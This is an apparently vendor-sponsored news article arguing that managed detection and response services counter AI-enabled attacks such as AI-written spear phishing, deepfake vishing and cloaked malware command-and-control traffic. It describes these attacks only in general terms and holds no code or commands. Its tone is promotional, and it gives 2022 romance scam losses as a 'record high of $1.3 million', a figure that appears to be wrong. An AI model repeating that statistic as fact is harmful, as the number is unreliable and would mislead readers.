Ransomware

AI threats and MDR

AI-powered cyberattacks exploit the advantages AI technologies have over humans with regard to speed, precision, coverage and scale, making these attacks more difficult to intercept and counter through traditional in-house security defenses. The increasing likelihood of AI-based attacks is motivating more organizations to seek assistance through other channels, such as by partnering with a managed detection and services (MDR) provider who is better positioned to deal with AI threats.  

AI and the role of MDR is expected to be a major discussion point at RSA's annual security conference taking place the week of April 24th. The following is a preview of that discussion.

Cybersecurity: What are AI threats?

To understand why the AI cybersecurity threat is real, we need only look at recent forecasts and studies that detail its impact on the industry. 

A 2021 study from MIT Technology Review found that 97 percent of global business leaders were troubled at the prospect of AI-enhanced attacks, with 68 percent showing greatest concern for strategic AI use in impersonation and spear phishing.

In a recent presentation given at Black Hat USA, security researchers demonstrated that next-generation language models such as OpenAI’s GPT-3 could be used to generate phishing content that “outperformed those that were manually created” by humans.

The difficulty in distinguishing AI from human activity is already being used to prey on the vulnerable. As previously reported by SC Magazine, romance scams (aided by natural language processing tools like ChatGPT) saw consumer-reported losses increase to a record high of $1.3 million in 2022, increasing by nearly 138% from 2021. When McAfee’s security team presented a ChatGPT-crafted love letter to more than 5,000 people worldwide, 33 percent thought that a human wrote the letter, while another 36 percent were unable to distinguish one way or another. 

In just the last couple weeks, hundreds of tech leaders around the globe – including Elon Musk (CEO of Tesla, SpaceX, and Twitter) and Steve Wozniak (cofounder of Apple) – issued a signed letter calling for a six-month pause on the “training of any AI systems more powerful than GPT-4.”

Given how rapidly adversary tactics are evolving, it’s very likely that AI-enabled attacks could become a common fixture in the cybercriminal’s playbook within the next couple years. Anticipating and dismantling AI attacks will demand a depth of expertise and coordination that some organizations simply do not have the money or resources to cultivate themselves. 

MDR could be the tool these organizations need to tip the scales back in their favor. MDR is a service primarily consisting of highly trained cybersecurity professionals who perform ‘managed detection and response’ duties on behalf of a customer. These duties include threat hunting investigations, continuous monitoring, threat detection and response, and guided remediation.

Below, we look at potential ways that AI can be used to attack organizations, as well as how MDR could be used to counter these attacks.

AI-assisted spear phishing

In this attack, the AI automatically scans social media (e.g., LinkedIn, Facebook, Twitter) to identify interests, professional connections, and online behavior of potential victims. This information can then be turned against the user by crafting language that mimics their communication style or speaks to one of their known interests. The AI can even sort users into camps based on an index of gullibility and how likely they are to respond, which allows it to train its phishing attacks on particularly vulnerable targets. The sudden dominance of ChatGPT and other natural language processing platforms makes it far easier for criminals to use AI in their phishing attacks.

"The AI-generated emails exhibited nuances such as rapport-building ('How are you feeling? I hope you are feeling better.'), deep organizational knowledge ('We are legally required to do a Privacy Impact Assessment every time we design or update a system.'), and fake context generation ('I’ll be frank with you. <Company Name> is not the best at branding.'). At the same time, the emails included no spelling or grammatical mistakes- typical signs of a phishing email as taught in training.”

Turing in a Box: Applying Artificial Intelligence as a Service to Targeted Phishing and Defending against AI-generated Attacks

MDR security operations analysts and threat hunters are trained to identify indicators of compromise (IOCs) commonly associated with phishing attacks, regardless of whether the language is AI-generated or not. With the aid of a MDR provider, organizations have better visibility over their IT assets and end users, and can more rapidly determine if requests from outside the organization are benign or not. For example, the MDR threat hunter could detect that the sender is abusing a PowerShell command to disguise malware by reading arguments in reverse. Or they might pinpoint the source of the request by looking at the IP address and then cross-referencing that address with other documented attacks to determine if there are similarities in origin. AI might be able to dupe gullible users with believable language, but MDR analysts have their eyes on the whole data picture, and the data doesn’t lie. 

Deepfakes and vishing attacks

Deepfake attacks involve using AI to generate a believable impersonation of a real human being, typically someone in a leadership position, by mimicking the person’s facial animations and voice. Vishing (or voice phishing) attacks can convince users into thinking they’re in a real phone conversation with another employee, which can easily entice them into giving up valuable information they believe the other party is entitled to have. Adversaries can use AI data mining to compile detailed voice records (i.e. work presentations, speeches) and videos, and then use this training data to generate digital copycats of their human targets. 

MDR analysts may not be able to stop criminals from creating deepfakes or initiating vishing attacks, but  they can play a role in foiling these attacks. At Sophos, for example, MDR analysts use a deep learning prediction model to analyze encrypted traffic and identify patterns across unrelated network flows. This model can determine if AI is being used to mine data at a massive scale, which allows the MDR team to notify the customer about possible social engineering attempts involving deepfakes or vishing. 

Malware communication cloaking

AI can be used to support malware attacks by cloaking malicious activity within what appears to be harmless network traffic. Once an attacker has implanted malware, that implant can use AI to collect and sort network traffic data on ports, requested domain names, and load volumes during certain time periods. This information can then be relayed to the default Command and Control server, ‘tricking’ it into registering a domain that shares the properties of the victim’s most commonly requested domain. Once this is arranged, the malware can come online and use the newly created domain to maintain communication with the C&C, allowing data to be exfiltrated at standard traffic levels and thereby evading security detection. A 2022 research paper authored by Traficom, the Finnish government's transportation and communications agency, even posits that “AI decision logic could theoretically enable malware to run multiple attack steps, find vulnerabilities and exploit them, all without [any] human intervention.”

Without a high-performing SOC, there’s very little chance that an organization could detect this sort of cloaking on their own. An MDR team, on the other hand, could spot it with relative ease. Sophos MDR, for example, uses encrypted payload analytics that can detect zero-day C2 servers and new variants of malware families based on patterns observed in the session size, direction, and interarrival times. It can also identify the presence of domain generation technology used by malware to avoid detection, such as the one discussed above. 

The MDR lifeline

As AI-enabled attacks become more common, organizations will need all the help they can get to keep pace with the speed, scale, and adaptive intelligence of this technology. 

MDR may not be the silver bullet that solves for all AI-related cybersecurity risks, but it makes a compelling case to be one of the more powerful tools in an organization’s arsenal. Having dedicated support from professional MDR threat hunters and analysts can ensure that organizations with understaffed SOCs aren’t left to navigate this new normal on their own. 

AI-assisted cyberattacks are the unfortunate reality going forward, but MDR provides companies a lifeline to better monitor, identify and rapidly respond to malicious AI before it’s too late. To learn more about how organizations are tackling the AI threat, be sure to tune into RSA 2023 where AI is expected to frame much of the discussion.

An In-Depth Guide to Ransomware

Get essential knowledge and practical strategies to protect your organization from ransomware attacks.

Get daily email updates

SC Media's daily must-read of the most current and pressing daily news

By clicking the Subscribe button below, you agree to SC Media Terms of Use and Privacy Policy.

You can skip this ad in 5 seconds